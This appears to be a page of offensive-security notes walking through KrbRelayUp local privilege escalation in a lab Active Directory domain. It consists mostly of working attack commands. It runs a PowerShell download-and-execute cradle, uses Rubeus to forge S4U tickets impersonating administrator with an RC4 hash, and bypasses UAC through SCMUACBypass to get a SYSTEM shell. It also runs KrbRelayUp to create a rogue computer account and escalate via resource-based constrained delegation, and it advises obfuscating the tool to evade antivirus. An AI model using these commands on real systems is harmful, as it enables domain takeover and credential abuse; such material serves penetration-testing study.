KrbRelay Up - Windows - PowerPack

Get the SID of that computer:

From windows

PS C:\Users\elena.lopez\Desktop> $o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
PS C:\Users\elena.lopez\Desktop> (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value

with Rubeus from Windows

iex(new-object net.webclient).downloadstring('')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
  • And just like the writeup made by @an0n_r0 we launch SCMUACBypass.exe by Tyranid and get a system shell

Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands:

.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
  • KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit with ShadowCredentials. All you need to know is on this page, this is leave as an exercice to the reader.

Last updated